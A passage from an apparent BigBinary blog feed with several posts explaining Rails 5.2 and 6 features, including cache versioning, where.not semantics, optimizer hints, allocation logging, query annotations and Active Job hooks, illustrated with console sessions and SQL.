      <content type="html"><![CDATA[<p><a href="https://github.com/rails/rails/pull/29092">Recyclable cache keys</a> or <em>cacheversioning</em> was introduced in Rails 5.2. Large applications frequently need toinvalidate their cache because cache store has limited memory. We can optimizecache storage and minimize cache miss using recyclable cache keys.</p><p>Recyclable cache keys is supported by all<a href="https://guides.rubyonrails.org/caching_with_rails.html#cache-stores">cache stores</a>that ship with Rails.</p><p>Before Rails 5.2, <code>cache_key</code>'s format was <em>{model_name}/{id}-{update_at}</em>. Here<code>model_name</code> and <code>id</code> are always constant for an object and <code>updated_at</code> changeson every update.</p><h4>Rails 5.1</h4><pre><code class="language-ruby">&gt;&gt; post = Post.last&gt;&gt; post.cache_key=&gt; &quot;posts/1-20190522104553296111&quot;# Update post&gt;&gt; post.touch&gt;&gt; post.cache_key=&gt; &quot;posts/1-20190525102103422069&quot; # cache_key changed</code></pre><p>In Rails 5.2, <code>#cache_key</code> returns <em>{model_name}/{id}</em> and new method<code>#cache_version</code> returns <em>{updated_at}</em>.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.cache_versioning = true&gt;&gt; post = Post.last&gt;&gt; post.cache_key=&gt; &quot;posts/1&quot;&gt;&gt; post.cache_version=&gt; &quot;20190522070715422750&quot;&gt;&gt; post.cache_key_with_version=&gt; &quot;posts/1-20190522070715422750&quot;</code></pre><p>Let's update <code>post</code> instance and check <code>cache_key</code> and <code>cache_version</code>'sbehaviour.</p><pre><code class="language-ruby">&gt;&gt; post.touch&gt;&gt; post.cache_key=&gt; &quot;posts/1&quot; # cache_key remains same&gt;&gt; post.cache_version=&gt; &quot;20190527062249879829&quot; # cache_version changed</code></pre><p>To use cache versioning feature, we have to enable<code>ActiveRecord::Base.cache_versioning</code> configuration. By default<code>cache_versioning</code> config is set to false for backward compatibility.</p><p>We can enable cache versioning configuration globally as shown below.</p><pre><code class="language-ruby">ActiveRecord::Base.cache_versioning = true# orconfig.active_record.cache_versioning = true</code></pre><p>Cache versioning config can be applied at model level.</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base  self.cache_versioning = trueend# Or, when setting `#cache_versioning` outside the model -Post.cache_versioning = true</code></pre><p>Let's understand the problem step by step with cache keys before Rails 5.2.</p><h4>Rails 5.1 (without cache versioning)</h4><p><em>1. Write <code>post</code> instance to cache using<a href="https://apidock.com/rails/ActiveSupport/Cache/Store/fetch"><code>fetch</code></a> api.</em></p><pre><code class="language-ruby">&gt;&gt; before_update_cache_key = post.cache_key=&gt; &quot;posts/1-20190527062249879829&quot;&gt;&gt; Rails.cache.fetch(before_update_cache_key) { post }=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 06:22:49&quot;&gt;</code></pre><p><em>2. Update <code>post</code> instance using<a href="https://apidock.com/rails/ActiveRecord/Persistence/touch"><code>touch</code></a>.</em></p><pre><code class="language-ruby">&gt;&gt; post.touch   (0.1ms)  begin transaction  Post Update (1.6ms)  UPDATE &quot;posts&quot; SET &quot;updated_at&quot; = ? WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-05-27 08:01:52.975653&quot;], [&quot;id&quot;, 1]]   (1.2ms)  commit transaction=&gt; true</code></pre><p><em>3. Verify stale <code>cache_key</code> in cache store.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(before_update_cache_key)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 06:22:49&quot;&gt;</code></pre><p><em>4. Write updated <code>post</code> instance to cache using new <code>cache_key</code>.</em></p><pre><code class="language-ruby">&gt;&gt; after_update_cache_key = post.cache_key=&gt; &quot;posts/1-20190527080152975653&quot;&gt;&gt; Rails.cache.fetch(after_update_cache_key) { post }=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>5. Cache store now has two copies of <code>post</code> instance.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(before_update_cache_key)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 06:22:49&quot;&gt;&gt;&gt; Rails.cache.fetch(after_update_cache_key)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>cache_key</em> and its associated instance becomes irrelevant as soon as aninstance is updated. But it stays in cache store until it is manuallyinvalidated.</p><p>This sometimes result in overflowing cache store with stale keys and data. Inapplications that extensively use cache store, a huge chunk of cache store getsfilled with stale data frequently.</p><p>Now let's take a look at the same example. This time with <em>cache versioning</em> tounderstand how recyclable cache keys help optimize cache storage.</p><h4>Rails 5.2 (cache versioning)</h4><p><em>1. Write <code>post</code> instance to cache store with <code>version</code> option.</em></p><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.cache_versioning = true&gt;&gt; post = Post.last&gt;&gt; cache_key = post.cache_key=&gt; &quot;posts/1&quot;&gt;&gt; before_update_cache_version = post.cache_version=&gt; &quot;20190527080152975653&quot;&gt;&gt; Rails.cache.fetch(cache_key, version: before_update_cache_version) { post }=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>2. Update <code>post</code> instance.</em></p><pre><code class="language-ruby">&gt;&gt; post.touch   (0.1ms)  begin transaction  Post Update (0.4ms)  UPDATE &quot;posts&quot; SET &quot;updated_at&quot; = ? WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;updated_at&quot;, &quot;2019-05-27 09:09:15.651029&quot;], [&quot;id&quot;, 1]]   (0.7ms)  commit transaction=&gt; true</code></pre><p><em>3. Verify stale <code>cache_version</code> in cache store.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(cache_key, version: before_update_cache_version)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 08:01:52&quot;&gt;</code></pre><p><em>4. Write updated <code>post</code> instance to cache.</em></p><pre><code class="language-ruby">&gt;&gt; after_update_cache_version = post.cache_version=&gt; &quot;20190527090915651029&quot;&gt;&gt; Rails.cache.fetch(cache_key, version: after_update_cache_version) { post }=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 09:09:15&quot;&gt;</code></pre><p><em>5. Cache store has replaced old copy of <code>post</code> with new version automatically.</em></p><pre><code class="language-ruby">&gt;&gt; Rails.cache.fetch(cache_key, version: before_update_cache_version)=&gt; nil&gt;&gt; Rails.cache.fetch(cache_key, version: after_update_cache_version)=&gt; #&lt;Post id: 1, title: &quot;First Post&quot;, created_at: &quot;2019-05-22 17:23:22&quot;, updated_at: &quot;2019-05-27 09:09:15&quot;&gt;</code></pre><p>Above example shows how recyclable cache keys maintains single, latest copy ofan instance. Stale versions are removed automatically when new version is addedto cache store.</p><p><em>Rails 6</em> added <code>#cache_versioning</code> for <code>ActiveRecord::Relation</code>.</p><p><code>ActiveRecord::Base.collection_cache_versioning</code> configuration should be enabledto use cache versioning feature on collections. It is set to false by default.</p><p>We can enable this configuration as shown below.</p><pre><code class="language-ruby">ActiveRecord::Base.collection_cache_versioning = true# orconfig.active_record.collection_cache_versioning = true</code></pre><p>Before Rails 6, <code>ActiveRecord::Relation</code> had <code>cache_key</code> in format<code>{table_name}/query-{query-hash}-{count}-{max(updated_at)}</code>.</p><p>In Rails 6, cache_key is split in stable part <code>cache_key</code> -<code>{table_name}/query-{query-hash}</code> and volatile part <code>cache_version</code> -<code>{count}-{max(updated_at)}</code>.</p><p>For more information, check out<a href="https://blog.bigbinary.com/2016/02/02/activerecord-relation-cache-key.html">blog on ActiveRecord::Relation#cache_key in Rails 5</a>.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; posts = Post.all&gt;&gt; posts.cache_key=&gt; &quot;posts/query-00644b6a00f2ed4b925407d06501c8fb-3-20190522172326885804&quot;</code></pre><h4>Rails 6</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.collection_cache_versioning = true&gt;&gt; posts = Post.all&gt;&gt; posts.cache_key=&gt; &quot;posts/query-00644b6a00f2ed4b925407d06501c8fb&quot;&gt;&gt; posts.cache_version=&gt; &quot;3-20190522172326885804&quot;</code></pre><p>Cache versioning works similarly for <code>ActiveRecord::Relation</code> as<code>ActiveRecord::Base</code>.</p><p>In case of <code>ActiveRecord::Relation</code>, if number of records change and/orrecord(s) are updated, then same <code>cache_key</code> is written to cache store with new<code>cache_version</code> and updated records.</p><h2>Conclusion</h2><p>Previously, cache invalidation had to be done manually either by deleting cacheor setting cache expire duration. Cache versioning invalidates stale dataautomatically and keeps latest copy of data, saving on storage and performancedrastically.</p><p>Check out the <a href="https://github.com/rails/rails/pull/29092">pull request</a> and<a href="https://github.com/rails/rails/commit/4f2ac80d4cdb01c4d3c1765637bed76cc91c1e35">commit</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 deprecates where.not as NOR & Rails 6.1 as NAND]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-deprecates-where-not-working-as-nor-and-will-change-to-nand-in-rails-6-1"/>
      <updated>2019-07-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-deprecates-where-not-working-as-nor-and-will-change-to-nand-in-rails-6-1</id>
      <content type="html"><![CDATA[<p>A notable deprecation warning has been added in Rails 6 when using <code>where.not</code>with multiple attributes.</p><p>Before Rails 6, if we use <code>where.not</code> with multiple attributes, it applieslogical <em>NOR (NOT(A) AND NOT(B))</em> in <em>WHERE</em> clause of the query. This does notalways work as expected.</p><p>Let's look at an example to understand this better.</p><p>We have <code>Post</code> model with a polymorphic association.</p><h5>Rails 5.2</h5><pre><code class="language-ruby">&gt;&gt; Post.all=&gt; #&lt;ActiveRecord::Relation [#&lt;Post id: 1, title: &quot;First Post&quot;, source_type: &quot;Feed&quot;, source_id: 100&gt;,#&lt;Post id: 2, title: &quot;Second Post&quot;, source_type: &quot;Feed&quot;, source_id: 101&gt;]&gt;&gt;&gt; Post.where(source_type: &quot;Feed&quot;, source_id: 100)=&gt; #&lt;ActiveRecord::Relation [#&lt;Post id: 1, title: &quot;First Post&quot;, source_type: &quot;Feed&quot;, source_id: 100&gt;]&gt;&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;, source_id: 100)=&gt; #&lt;ActiveRecord::Relation []&gt;</code></pre><p>In the last query, we expect ActiveRecord to fetch one record.</p><p>Let's check SQL generated for the above case.</p><pre><code class="language-ruby">&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;, source_id: 100).to_sql=&gt; SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;source_type&quot; != 'Feed' AND &quot;posts&quot;.&quot;source_id&quot; != 100</code></pre><p><code>where.not</code> applies <em>AND</em> to the negation of <code>source_type</code> and <code>source_id</code>, andfails to fetch expected records.</p><p>In such cases, correct implementation of <code>where.not</code> would be logical <em>NAND</em><em>(NOT(A) OR NOT(B))</em>.</p><p>Let us query <code>posts</code> table using NAND this time.</p><pre><code class="language-ruby">&gt;&gt; Post.where(&quot;source_type != 'Feed' OR source_id != 100&quot;)   SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE (source_type != 'Feed' OR source_id != 100)=&gt; #&lt;ActiveRecord::Relation [#&lt;Post id: 2, title: &quot;Second Post&quot;, source_type: &quot;Feed&quot;, source_id: 101&gt;]&gt;</code></pre><p>Above query works as expected and returns one record. Rails 6.1 will change<code>where.not</code> working to NAND similar to the above query.</p><h5>Rails 6.0.0.rc1</h5><pre><code class="language-ruby">&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;, source_id: 100)DEPRECATION WARNING: NOT conditions will no longer behave as NOR in Rails 6.1. To continue using NOR conditions, NOT each conditions manually (`.where.not(:source_type =&gt; ...).where.not(:source_id =&gt; ...)`). (called from irb_binding at (irb):1)=&gt; #&lt;ActiveRecord::Relation []&gt;</code></pre><p>It is well mentioned in deprecation warning that if we wish to use <em>NOR</em>condition with multiple attributes, we can chain multiple <code>where.not</code> using asingle predicate.</p><pre><code class="language-ruby">&gt;&gt; Post.where.not(source_type: &quot;Feed&quot;).where.not(source_id: 100)</code></pre><p>Here's the relevant <a href="https://github.com/rails/rails/issues/31209">discussion</a>and <a href="https://github.com/rails/rails/pull/36029">pull request</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support for Optimizer Hints]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-supports-optimizer-hints"/>
      <updated>2019-07-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-supports-optimizer-hints</id>
      <content type="html"><![CDATA[<p>Rails 6 has added support to provide optimizer hints.</p><h2>What is Optimizer Hints?</h2><p>Many relational database management systems (RDBMS) have a query optimizer. Thejob of the query optimizer is to determine the most efficient and fast plan toexecute a given SQL query. Query optimizer has to consider all possible queryexecution plans before it can determine which plan is the optimal plan forexecuting the given SQL query and then compile and execute that query.</p><p>An optimal plan is chosen by the query optimizer by calculating the cost of eachpossible plans. Typically, when the number of tables referenced in a join queryincreases, then the time spent in query optimization grows exponentially whichoften affects the system's performance. The fewer the execution plans the queryoptimizer needs to evaluate, the lesser time is spent in compiling and executingthe query.</p><p>As an application designer, we might have more context about the data stored inour database. With the contextual knowledge about our database, we might be ableto choose a more efficient execution plan than the query optimizer.</p><p>This is where the optimizer hints or optimizer guidelines come into picture.</p><p>Optimizer hints allow us to control the query optimizer to choose a certainquery execution plan based on the specific criteria. In other words, we can hintthe optimizer to use or ignore certain optimization plans using optimizer hints.</p><p>Usually, optimizer hints should be provided only when executing a complex queryinvolving multiple table joins.</p><p>Note that the optimizer hints only affect an individual SQL statement. To alterthe optimization strategies at the global level, there are different mechanismssupported by different databases. Optimizer hints provide finer control overother mechanisms which allow altering optimization plans by other means.</p><p>Optimizer hints are supported by many databases such as<a href="https://dev.mysql.com/doc/refman/8.0/en/optimizer-hints.html">MySQL</a>,<a href="https://pghintplan.osdn.jp/pg_hint_plan.html">PostgreSQL with the help of <code>pg_hint_plan</code> extension</a>,<a href="https://docs.oracle.com/en/database/oracle/oracle-database/12.2/tgsql/influencing-the-optimizer.html">Oracle</a>,<a href="https://docs.microsoft.com/en-us/sql/t-sql/queries/hints-transact-sql-query?view=sql-server-2017">MS SQL</a>,<a href="https://www.ibm.com/support/knowledgecenter/en/SSEPGG_11.1.0/com.ibm.db2.luw.admin.perf.doc/doc/c0070117.html">IBM DB2</a>,etc. with varying syntax and options.</p><h2>Optimizer Hints in Rails 6</h2><p>Before Rails 6, we have to execute a raw SQL query to use the optimizer hints.</p><pre><code class="language-ruby">query = &quot;SELECT            /*+ JOIN_ORDER(articles, users) MAX_EXECUTION_TIME(60000) */            articles.*         FROM articles         INNER JOIN users         ON users.id = articles.user_id         WHERE (published_at &gt; '2019-02-17 13:15:44')        &quot;.squishActiveRecord::Base.connection.execute(query)</code></pre><p>In the above query, we provided two optimizer hints to MySQL .</p><pre><code class="language-plaintext">/*+ HINT_HERE ANOTHER_HINT_HERE ... */</code></pre><p>Another approach to use optimizer hints prior to Rails 6 is to<a href="https://gist.github.com/kamipo/4c8539f0ce4acf85075cf5a6b0d9712e">use a monkey patch like this</a>.</p><p>In Rails 6, using optimizer hints is easier.</p><p>The same example looks like this in Rails 6.</p><pre><code class="language-ruby">Article  .joins(:user)  .where(&quot;published_at &gt; ?&quot;, 2.months.ago)  .optimizer_hints(    &quot;JOIN_ORDER(articles, users)&quot;,    &quot;MAX_EXECUTION_TIME(60000)&quot;  )</code></pre><p>This produces the same SQL query as above but the result is of type<code>ActiveRecord::Relation</code>.</p><p>In PostgreSQL (using the <code>pg_hint_plan</code> extension), the optimizer hints have adifferent syntax.</p><pre><code class="language-ruby">Article  .joins(:user)  .where(&quot;published_at &gt; ?&quot;, 2.months.ago)  .optimizer_hints(&quot;Leading(articles users)&quot;, &quot;SeqScan(articles)&quot;)</code></pre><p>Please checkout the documentation of each database separately to learn thesupport and syntax of optimizer hints.</p><p>To learn more, please<a href="https://github.com/rails/rails/pull/35615">checkout this PR</a> which introducedthe <code>#optimization_hints</code> method to Rails 6.</p><h2>Bonus example: Using optimizer hints to speedup a slow SQL statement in MySQL</h2><p>Consider that we have <code>articles</code> table with some indexes.</p><pre><code class="language-ruby">class CreateArticles &lt; ActiveRecord::Migration[6.0]  def change    create_table :articles do |t|      t.string :title, null: false      t.string :slug, null: false      t.references :user      t.datetime :published_at      t.text :description      t.timestamps      t.index :slug, unique: true      t.index [:published_at]      t.index [:slug, :user_id]      t.index [:published_at, :user_id]      t.index [:title, :slug]    end  endend</code></pre><p>Let's try to fetch all the articles which have been published in the last 2months.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago)# Article Load (10.5ms)  SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:38:18.647296')=&gt; #&lt;ActiveRecord::Relation [#&lt;Article id: 20, title: &quot;Article 20&quot;, slug: &quot;article-20&quot;, user_id: 1, ...]&gt;</code></pre><p>Let's use <code>EXPLAIN</code> to investigate why it is taking 10.5ms to execute thisquery.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago).explain# Article Load (13.9ms)  SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:39:05.380577')=&gt; # EXPLAIN for: SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:39:05.380577')# +--------+----------+----------------+-----------+------+----------+-------+# | select |   table  | possible_keys  | key       | rows | filtered | Extra |# | _type  |          |                |           |      |          |       |# +--------+----------+----------------+-----------+------+----------+-------+# | SIMPLE |   users  | PRIMARY        | PRIMARY   | 2    | 100.0    | Using |# |        |          |                |           |      |          | index |# +--------+----------+----------------+-----------+------+----------+-------+# | SIMPLE | articles | index          | index     | 9866 | 10.0     | Using |# |        |          | _articles      | _articles |      |          | where |# |        |          | _on_user_id,   | _on       |      |          |       |# |        |          | index          | _user_id  |      |          |       |# |        |          | _articles      |           |      |          |       |# |        |          | _on            |           |      |          |       |# |        |          | _published_at, |           |      |          |       |# |        |          | index          |           |      |          |       |# |        |          | _articles      |           |      |          |       |# |        |          | _on            |           |      |          |       |# |        |          | _published_at  |           |      |          |       |# |        |          | _and_user_id   |           |      |          |       |# +--------+----------+----------------+-----------+------+----------+-------+</code></pre><p>According to the above table, it appears that the query optimizer is considering<code>users</code> table first and then the <code>articles</code> table.</p><p>The <code>rows</code> column indicates the estimated number of rows the query optimizermust examine to execute the query.</p><p>The<a href="https://dev.mysql.com/doc/refman/8.0/en/explain-output.html#explain_filtered"><code>filtered</code></a>column indicates an estimated percentage of table rows that will be filtered bythe table condition.</p><p>The formula <code>rows x filtered</code> gives the number of rows that will be joined withthe following table.</p><p>Also,</p><ul><li>For <code>users</code> table, the number of rows to be joined with the following table is<code>2 x 100% = 2</code>,</li><li>For <code>articles</code> table, the number of rows to be joined with the following tableis <code>500 * 7.79 = 38.95</code>.</li></ul><p>Since the <code>articles</code> tables contain more records which references very fewrecords from the <code>users</code> table, it would be better to consider the <code>articles</code>table first and then the <code>users</code> table.</p><p>We can hint MySQL to consider the <code>articles</code> table first as follows.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago).optimizer_hints(&quot;JOIN_ORDER(articles, users)&quot;)# Article Load (2.2ms)  SELECT `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:54:06.230651')=&gt; #&lt;ActiveRecord::Relation [#&lt;Article id: 20, title: &quot;Article 20&quot;, slug: &quot;article-20&quot;, user_id: 1, ...]&gt;</code></pre><p>Note that it took 2.2ms now to fetch the same records by providing<code>JOIN_ORDER(articles, users)</code> optimization hint.</p><p>Let's try to <code>EXPLAIN</code> what changed by using this <code>JOIN_ORDER(articles, users)</code>optimization hint.</p><pre><code class="language-ruby">&gt;&gt; Article.joins(:user).where(&quot;published_at &gt; ?&quot;, 2.months.ago).optimizer_hints(&quot;JOIN_ORDER(articles, users)&quot;).explain# Article Load (4.1ms)  SELECT /*+ JOIN_ORDER(articles, users) */ `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:55:24.335152')=&gt; # EXPLAIN for: SELECT /*+ JOIN_ORDER(articles, users) */ `articles`.* FROM `articles` INNER JOIN `users` ON `users`.`id` = `articles`.`user_id` WHERE (published_at &gt; '2019-02-17 11:55:24.335152')# +--------+----------+----------------+-----------+------+----------+--------+# | select |   table  | possible_keys  | key       | rows | filtered | Extra  |# | _type  |          |                |           |      |          |        |# +--------+----------+----------------+-----------+------+----------+--------+# | SIMPLE | articles | index          | index     | 769  | 100.0    | Using  |# |        |          | _articles      | _articles |      |          | index  |# |        |          | _on_user_id,   | _on       |      |          | condi  |# |        |          | index          | _publish  |      |          | tion;  |# |        |          | _articles      | ed_at,    |      |          | Using  |# |        |          | _on            |           |      |          | where  |# |        |          | _published_at, |           |      |          |        |# |        |          | index          |           |      |          |        |# |        |          | _articles      |           |      |          |        |# |        |          | _on            |           |      |          |        |# |        |          | _published_at  |           |      |          |        |# |        |          | _and_user_id   |           |      |          |        |# +--------+----------+----------------+-----------+------+----------+--------+# | SIMPLE | users    | PRIMARY        | PRIMARY   | 2    | 100.0    | Using  |# |        |          |                |           |      |          | index  |# +--------+----------+----------------+-----------+------+----------+--------+</code></pre><p>The result of the <code>EXPLAIN</code> query shows that the <code>articles</code> table was consideredfirst and then the <code>users</code> table as expected. We can also see that the<code>index_articles_on_published_at</code> index key was considered from the possible keysto execute the given query. The <code>filtered</code> column for both tables shows that thenumber of filtered rows was 100% which means no filtering of rows occurred.</p><p>We hope this example helps in understanding how to use <code>#explain</code> and<code>#optimization_hints</code> methods in order to investigate and debug the performanceissues and then fixing it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 reports object allocations while rendering]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-reports-object-allocations-made-while-rendering-view-templates"/>
      <updated>2019-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-reports-object-allocations-made-while-rendering-view-templates</id>
      <content type="html"><![CDATA[<p>Recently, Rails 6<a href="https://github.com/rails/rails/pull/33449">added <code>allocations</code> feature</a> to<code>ActiveSupport::Notifications::Event</code>. Using this feature, an event subscribercan see how many number of objects were allocated during the event's start timeand end time. We have written in detail about this feature<a href="https://blog.bigbinary.com/2019/04/24/rails-6-adds-cpu-time-idle-time-and-allocations-to-activesupport-notifications-event.html">here</a>.</p><p>By taking the benefit of this feature, Rails 6 now reports the allocations madewhile rendering a view template, a partial and a collection.</p><pre><code class="language-plaintext">Started GET &quot;/articles&quot; for ::1 at 2019-04-15 17:24:09 +0530Processing by ArticlesController#index as HTMLRendering articles/index.html.erb within layouts/applicationRendered shared/\_ad_banner.html.erb (Duration: 0.1ms | Allocations: 6)Article Load (1.3ms) SELECT &quot;articles&quot;.\* FROM &quot;articles&quot; app/views/articles/index.html.erb:5Rendered collection of articles/\_article.html.erb [100 times] (Duration: 6.1ms | Allocations: 805)Rendered articles/index.html.erb within layouts/application (Duration: 17.6ms | Allocations: 3901)Completed 200 OK in 86ms (Views: 83.6ms | ActiveRecord: 1.3ms | Allocations: 29347)</code></pre><p>Notice the <code>Allocations:</code> information in the above logs.</p><p>We can see that</p><ul><li>6 objects were allocated while rendering <code>shared/_ad_banner.html.erb</code> viewpartial,</li><li>805 objects were allocated while rendering a collection of 100<code>articles/_article.html.erb</code> view partials,</li><li>and 3901 objects were allocated while rendering <code>articles/index.html.erb</code> viewtemplate.</li></ul><p>We can use this information to understand how much time was spent whilerendering a view template and how many objects were allocated in the process'memory between the time when that view template had started rendering and thetime when that view template had finished rendering.</p><p>To learn more about this feature, please check<a href="https://github.com/rails/rails/pull/34136">rails/rails#34136</a>.</p><p>Note that we can also collect this information by subscribing to<a href="https://edgeguides.rubyonrails.org/active_support_instrumentation.html#action-view">Action View hooks</a>.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe /^render\_.+.action_view\$/ do |event|views_path = Rails.root.join(&quot;app/views/&quot;).to_stemplate_identifier = event.payload[:identifier]template_name = template_identifier.sub(views_path, &quot;&quot;)message = &quot;[#{event.name}] #{template_name} (Allocations: #{event.allocations})&quot;ViewAllocationsLogger.log(message)end</code></pre><p>This should log something like this.</p><pre><code class="language-plaintext">[render_partial.action_view] shared/\_ad_banner.html.erb (Allocations: 43)[render_collection.action_view] articles/\_article.html.erb (Allocations: 842)[render_template.action_view] articles/index.html.erb (Allocations: 4108)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#annotate]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-annotate-to-activerecord-relation-queries"/>
      <updated>2019-07-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-annotate-to-activerecord-relation-queries</id>
      <content type="html"><![CDATA[<p>Rails 6 has added <code>ActiveRecord::Relation#annotate</code> to allow adding comments tothe SQL queries generated by the <code>ActiveRecord::Relation</code> instance.</p><p>Here is how it can be used.</p><pre><code class="language-ruby">&gt; &gt; User.annotate(&quot;User whose name starts with 'A'&quot;).where(&quot;name LIKE ?&quot;, &quot;A%&quot;)SELECT &quot;users&quot;._ FROM &quot;users&quot;WHERE (name LIKE 'A%')/_ User whose name starts with 'A' \*/LIMIT ? [[&quot;LIMIT&quot;, 11]]</code></pre><p><code>ActiveRecord::Relation#annotate</code> allows to add multiple annotations on a query</p><pre><code class="language-ruby">&gt; &gt; bigbinary = Organization.find_by!(name: &quot;BigBinary&quot;)&gt; &gt; User.annotate(&quot;User whose name starts with 'A'&quot;)       .annotate(&quot;AND belongs to BigBinary organization&quot;)       .where(&quot;name LIKE ?&quot;, &quot;A%&quot;)       .where(organization: bigbinary)SELECT &quot;users&quot;._ FROM &quot;users&quot;WHERE (name LIKE 'A%') AND &quot;users&quot;.&quot;organization_id&quot; = ?/_ Users whose name starts with 'A' _//_ AND belongs to BigBinary organization \*/LIMIT ? [[&quot;organization_id&quot;, 1], [&quot;LIMIT&quot;, 11]]</code></pre><p>Also, <code>ActiveRecord::Relation#annotate</code> allows annotating scopes and modelassociations.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Basescope :active, -&gt; { where(status: 'active').annotate(&quot;Active users&quot;) }end&gt; &gt; User.active&gt; &gt; SELECT &quot;users&quot;._ FROM &quot;users&quot;&gt; &gt; /_ Active users \*/&gt; &gt; LIMIT ? [[&quot;LIMIT&quot;, 11]]&gt; &gt; ~~~Check out the[pull request](https://github.com/rails/rails/pull/35617)for more details on this.</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds hook to Active Job for retry & discard]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-hooks-to-activejob-around-retries-and-discards"/>
      <updated>2019-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-hooks-to-activejob-around-retries-and-discards</id>
      <content type="html"><![CDATA[<h2>Before Rails 6</h2><p>Before Rails 6, we have to provide a custom block to perform custom logging andmonitoring around retries and discards of the jobs defined using Active Jobframework.</p><pre><code class="language-ruby">class Container::DeleteJob &lt; ActiveJob::Baseretry_on Timeout::Error, wait: 2.seconds, attempts: 3 do |job, error|message = &quot;Stopped retrying #{job.class} (JID #{job.job_id})with #{job.arguments.join(', ')} due to'#{error.class} - #{error.message}'.This job was retried for #{job.executions} times.&quot;.squish    BackgroundJob::ErrorLogger.log(message)enddiscard_on Container::NotFoundError do |job, error|message = &quot;Discarded #{job.class} (JID #{job.job_id})with #{job.arguments.join(', ')} due to'#{error.class} - #{error.message}' error.&quot;.squish    BackgroundJob::ErrorLogger.log(message)enddef perform(container_id)Container::DeleteService(container_id).process    # Will raise Container::NotFoundError    # if no container is found with 'container_id'.    # Might raise Timeout::Error when the remote API is not responding.endend</code></pre><p>Notice the custom blocks provided to <code>retry_on</code> and <code>discard_on</code> methods to anindividual job in the above example.</p><p>Extracting such custom logic to a base class or to a 3rd-party gem is possiblebut it will be non-standard and will be a bit difficult task.</p><p>An alternative approach is to<a href="https://guides.rubyonrails.org/active_support_instrumentation.html#subscribing-to-an-event">subscribe</a>to the hooks instrumented using Active Support Instrumentation API which is astandard and recommended way. Prior versions of Rails 6 already instruments<a href="https://guides.rubyonrails.org/v5.2/active_support_instrumentation.html#active-job">some hooks</a>such as <code>enqueue_at.active_job</code>, <code>enqueue.active_job</code>,<code>perform_start.active_job</code>, and <code>perform.active_job</code>. Unfortunately no hook isinstrumented around retries and discards of an Active Job prior to Rails 